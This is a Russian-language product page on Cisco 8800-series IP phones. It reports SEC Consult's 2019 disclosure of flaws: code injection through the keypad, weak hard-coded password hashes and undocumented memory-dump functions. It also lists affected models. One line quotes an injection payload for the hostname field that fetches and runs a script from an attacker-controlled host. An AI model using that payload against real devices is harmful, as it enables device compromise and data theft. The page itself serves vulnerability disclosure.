Cisco 8800-серия IP-телефонов

Продукт
Разработчики: Cisco Systems
Технологии: IP-телефония,  Офисная техника

Содержание

Серия 8800 включает модели корпоративных VoIP-телефонов Cisco.

2019

Уязвимость в VoIP-телефонах Cisco серии 8800, позволяющая красть данные

Компания SEC Consult 9 января 2019 года сообщила о том, что выявила целый ряд проблем в программных оболочках популярных систем интернет-телефонии Cisco VoIP Phone 8800.

Как отмечается, одна из ключевых проблем заключается в возможности инъекции JavaScript-подобного кода с помощью встроенной клавиатуры T9. Иными словами, злоумышленник может использовать встроенную цифро-буквенную клавиатуру VoIP-телефона для ввода вредоносного кода.

Например, имя хоста телефона можно подменить на код примерно такого содержания:

hostname`><img src=http://$IP/sec.js onload=exec()>,

И он добросовестно скачает посторонний файл (sec.js) с удаленного источника и запустит его.

Помимо этого, в программной оболочке телефонов содержатся многочисленные устаревшие — и, следовательно, небезопасные — библиотеки кода, а также жестко закодированные реквизиты доступа. Они хранятся в виде хэшей в файле с красноречивым названием /etc/passwd; хэширование произведено с помощью устаревшего алгоритма UNIX MD5+salt, вдобавок, как оказалось, сами пароли очень слабые, так что вскрыть их и получить доступ к устройству через SSH оказалось весьма тривиальной задачей.

Обнаружить уязвимости удалось с помощью собственной платформы SEC Consult — IoT Inspector, предназначенной для поиска проблем в программных оболочках устройствах интернета вещей. TAdviser выпустил Карту российского рынка цифровизации строительства 25.6 т

Был также произведен ручной анализ, позволивший выявить в «прошивке» телефонов незадокументированные, но легко эксплуатируемые функции, позволяющие потенциальному злоумышленнику выводить дампы памяти и, соответственно, красть данные.

«
Проблему нельзя назвать рядовой, — считает Олег Галушкин, директор по безопасности компании SEC Consult Services, российского представительства SEC Consult. — VoIP-телефоны Cisco серии 8800 активно используются по всему миру в госсекторе и в крупном бизнесе — это касается и России, где данные устройства популярны в крупнейших корпорациях. Подобные уязвимости представляют стратегическую угрозу для бизнеса уже потому, что их очень легко эксплуатировать; похищение критически важных данных в подобных случаях также оказывается «общим местом».
»

Описанные уязвимости выявлены в программной оболочке Cisco IP Phone 88xx версии 2-0-1 ES-15 (ID: f86aa7612d9311e6).[1] По сведениям, предоставленных самой корпорацией Cisco, уязвимости затрагивают следующие модели:

  • IP Conference Phone 8832
  • IP Phone 8811
  • IP Phone 8841
  • IP Phone 8845
  • IP Phone 8851
  • IP Phone 8861
  • IP Phone 8865
  • Unified IP Conference Phone 8831
  • Wireless IP Phone 8821
  • Wireless IP Phone 8821-EX

По информации SEC Consult, вендор уже внес необходимые исправления.

Модельный ряд серии 8800

На январь 2019 года модельный ряд VoIP-телефонов Cisco серии 8800 включает:

  • Cisco IP Conference Phone 8832
  • Cisco IP Phone 8865 Key Expansion Module
  • Cisco IP Phone 8865
  • Cisco IP Phone 8861
  • Cisco IP Phone 8851
  • Cisco IP Phone 8851/8861 Key Expansion Module
  • Cisco IP Phone 8845
  • Cisco IP Phone 8841
  • Cisco IP Phone 8811
  • Cisco IP Phone 8800 Key Expansion Module
  • Cisco Unified IP Conference Phone 8831
  • Cisco Wireless IP Phone 8821
  • Cisco Wireless IP Phone 8821-EX

Примечания



СМ. ТАКЖЕ (1)


Подрядчики-лидеры по количеству проектов

За всю историю
2021 год
2022 год
2023 год
Текущий год

Распределение вендоров по количеству проектов внедрений (систем, проектов) с учётом партнёров

За всю историю
2021 год
2022 год
2023 год
Текущий год


Распределение вендоров по количеству проектов внедрений (систем, проектов) с учётом партнёров

За всю историю
2021 год
2022 год
2023 год
Текущий год

  ЭЛАР (Электронный архив, НПО Опыт) (1, 153)
  ПроСофт-ПК (1, 153)
  Xerox (33, 108)
  Konica Minolta (Коника Минолта) (13, 48)
  Lenovo (21, 27)
  Другие (878, 231)

  ПроСофт-ПК (1, 3)
  ЭЛАР (Электронный архив, НПО Опыт) (1, 3)
  Acer (1, 1)
  АТОЛ (1, 1)
  Другие (0, 0)